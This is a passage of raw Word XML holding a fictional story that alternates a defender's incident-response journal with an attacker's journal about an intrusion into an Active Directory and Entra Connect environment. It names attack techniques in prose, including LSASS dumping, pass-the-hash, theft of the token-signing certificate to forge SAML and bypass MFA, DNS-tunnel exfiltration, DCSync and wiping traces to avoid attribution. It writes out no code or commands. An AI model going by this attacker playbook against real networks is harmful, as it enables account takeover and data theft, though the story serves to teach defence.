    <w:p w14:paraId="6732A84B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 14, 0915: rjohnson (HR Director)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F2442" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>November 13, 1422: twilliams (VP of People)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEB7BD" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>rjohnson — the HR Director. I checked their group memberships. Domain Users, HR-All, and... Helpdesk-Admins. That's a privileged group. Helpdesk admins have local admin rights on most workstations and can reset passwords for non-privileged users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546BBD9A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But more importantly, I checked rjohnson's recent activity. They RDP'd to AADC-SYNC-01 on November 10 at 1430. The Entra Connect server. And their session was still active — they never logged off. They just disconnected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4455A505" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>If the LSASS dump captured rjohnson's credentials, and rjohnson has an active session on AADC-SYNC-01, the attacker can pass-the-ticket or pass-the-hash to that server. They don't need to crack the password — they can use the Kerberos ticket or NTLM hash directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8961F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I immediately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293ECEA" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Reset rjohnson's password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4BC0E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Forced logoff of all rjohnson sessions across the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF200E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Checked AADC-SYNC-01 for anomalous activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD910D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>On AADC-SYNC-01, I found something that made my blood run cold: at 0923 — eleven minutes after the LSASS dump on WS-HR-012 — there was a successful RDP logon from WS-HR-012 using rjohnson's credentials. But rjohnson was in a meeting at 0923. I checked the badge access logs. She swiped into the conference room at 0915 and didn't leave until 1015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B128301" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>Someone used rjohnson's credentials from WS-HR-012 while she was physically elsewhere. That's not her. That's the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30388AB1" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>They were on AADC-SYNC-01 for six minutes. Six minutes. What can you do in six minutes on an Entra Connect server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D6D2A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>You can export the Token-signing certificate. You can view the Entra Connect configuration. You can establish a new synchronization rule that backdoors cloud accounts. You can do a lot of damage in six minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC194F6" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I checked the certificate store on </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AADC-SYNC-01</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. The Token-signing certificate is still there. But has it been exported? I checked the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CAPI2</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> operational log (which logs certificate operations). No export events. But if the attacker used mimikatz or a custom tool to extract the private key from memory, it wouldn't show in </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CAPI2</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C7DC0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I need to rotate the Token-signing certificate. Immediately. This is the cloud equivalent of rotating </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. If the attacker has the Token-signing certificate, they can forge SAML assertions for any Entra ID account. They can bypass MFA. They can become Global Administrator in the cloud without ever touching an on-premises DC again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F12D87" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The rotation process is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C7AC5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Open Microsoft Entra Connect wizard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAEB288" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Go to "Tasks" &gt; "Manage federation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03D284" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Generate new Token-signing certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFD3E3" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Update Entra ID trust properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960A5AC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Verify federation metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC09B37" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But there's a catch: rotating the Token-signing certificate breaks federation for 5-15 minutes. All cloud SSO stops working. Every user trying to access Office 365, SharePoint, Teams — they all get authentication failures. It's a business-impacting change that requires change management approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670F5DC0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I don't have time for change management. I'm doing it now. I'll file the paperwork later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C879C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>While the wizard runs, I'm also checking Entra ID sign-in logs for anomalous activity. Specifically, I'm looking for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B44FC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Sign-ins from impossible travel locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2652A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Sign-ins bypassing MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477FF27F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>SAML token anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286BDBE" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>New device registrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629E010" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Nothing yet. But if they have the certificate, the forgeries won't show up as "anomalous" — they'll look like legitimate federated sign-ins. The only way to detect them is to monitor for SAML assertions with unusual attributes or timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85AEF0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I just enabled SAML token auditing in Entra ID. It's a preview feature that logs the full SAML assertion for every federated sign-in. It's going to generate massive log volume. But I need it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669500F5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">This is exhausting. I've been fighting this attacker for twelve days. I've rotated </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>, deleted malicious GPOs, blocked C2 domains, isolated compromised hosts, and now I'm rotating cloud federation certificates. And every time I fix something, they find a new angle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5293B0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But I'm learning their patterns. They're patient but not infinitely so. They get greedy. The LSASS dump was risky — they could have waited longer, found a quieter host, used a less detectable technique. But they didn't. They got impatient. They wanted the Entra Connect server, and they wanted it now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8BB39" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Impatience is how attackers get caught. I need to exploit that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58337650" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00000000" w:rsidP="007B3505">
      <w:r>
        <w:pict w14:anchorId="41E44821">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="494EB786" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 15 — 1545</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE36F10" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚔️</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker's Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F289B6C" w14:textId="11115826" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="00315570" w:rsidP="007B3505">
      <w:r>
        <w:t>GREAT</w:t>
      </w:r>
      <w:r w:rsidR="007B3505" w:rsidRPr="007B3505">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF3336" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The LSASS dump was a mistake. I knew it was risky. I </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>knew</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> it. But I let the pressure get to me. Twelve days of silence, watching the defender systematically dismantle my infrastructure, and I couldn't take it anymore. I needed a win. I needed the Entra Connect server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC6234" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">And I got it. For six minutes, I was on AADC-SYNC-01. I exported the Token-signing certificate using a custom PowerShell script that extracts the private key from the CNG key store without triggering </w:t>
      </w:r>
      <w:r w:rsidRPr="00315570">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CAPI2</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> logs. I had the certificate. I had the private key. I had the keys to their cloud kingdom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A103897" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Then the session died. rjohnson's credentials were rotated out from under me. The RDP session force-disconnected. I was kicked off the server mid-export.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B57A836" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Did I get the full certificate? I don't know. The script output was truncated. I have a file called </w:t>
      </w:r>
      <w:r w:rsidRPr="00315570">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>token_signing.pfx</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> on my local machine, but it's only 1.2KB. A proper PFX with private key should be 3-4KB minimum. It's incomplete. Corrupted. Useless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDCF1AA" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I tried to reconnect. Access Denied. Password changed. Account locked. They're onto me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FDCA1" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Worse: my DNS tunneling exfiltration from WS-HR-012 was partially blocked. I got maybe 30% of the LSASS dump before the resolver started returning NXDOMAIN. Not enough to crack additional credentials reliably. I might have jdoe's hash. I might have fragments of rjohnson's session keys. But I don't have enough to move laterally again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FC61B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>And the GPO persistence? Dead. The registry keys are being cleaned. I can see the cleanup in my telemetry — machine after machine failing to check in, the blocked domain queries dropping to zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFEDCD" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I have one card left: the dormant Cobalt Strike beacon on WS-HR-012. It's still there, still checking in every 72 hours. But the host is isolated now. I can see the beacon trying to connect and failing. The network team cut it off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E28BD8" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>So here's where I stand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BA40C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Golden Tickets: Dead (</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> rotated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71649C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>GPO persistence: Dead (found and deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D7F14" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>WMI subscription: Dead (found and removed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4670E3E7" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>C2 infrastructure: Burned (blocked and hunted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3F340" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>LSASS dump: Partial failure (incomplete exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF7D264" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Entra Connect access: Lost (credentials rotated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F0EC8" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Token-signing certificate: Incomplete (corrupted export)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7014C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I have nothing. I am naked in their network with no clothes, no weapons, and no friends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F99700" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But I'm not done. I'm never done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322C567" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I still have </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> credentials. The account is disabled for interactive logon, but the password hasn't been changed. And </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> still has </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Replicating Directory Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> rights. If I can find a single domain-joined host that hasn't been fully remediated — a machine that missed the GPO cleanup, a server in a forgotten subnet, a lab environment that isn't properly managed — I can DCSync again. Pull the new krbtgt hash. Forge new Golden Tickets. Start over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBB132" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>The defender is good. They're very good. But they're also human. They're tired. They've been fighting for twelve days. They've rotated passwords, deleted GPOs, isolated hosts, and rotated cloud certificates. At some point, they have to sleep. They have to declare victory. They have to move on to the next incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961FC99" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">That's when I'll be back. Not today. Not tomorrow. But in a month. Two months. When the incident response team has disbanded, when the monitoring has returned to baseline, when </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup's</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> password rotation is overdue because someone forgot to add it to the quarterly rotation schedule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F243680" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>That's the thing about persistence: it doesn't have to be technical. It can be organizational. It can be the gap between "we fixed this" and "we maintain this." It can be the human tendency to move on, to forget, to prioritize the new fire over the old ember.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B99D4" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I am the ember. And I will wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E591EE0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But for now, I need to burn everything. Wipe my local machines. Destroy the VPS instances. Clear the cryptocurrency wallets I used for infrastructure payments. The defender has enough IOCs to share with threat intel partners. I don't want attribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C024E70" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>This round goes to the blue team. They earned it. They fought hard, they thought creatively, and they didn't give up. I respect that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88216F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But this isn't the end. It's just halftime.</w:t>
      </w:r>
    </w:p>
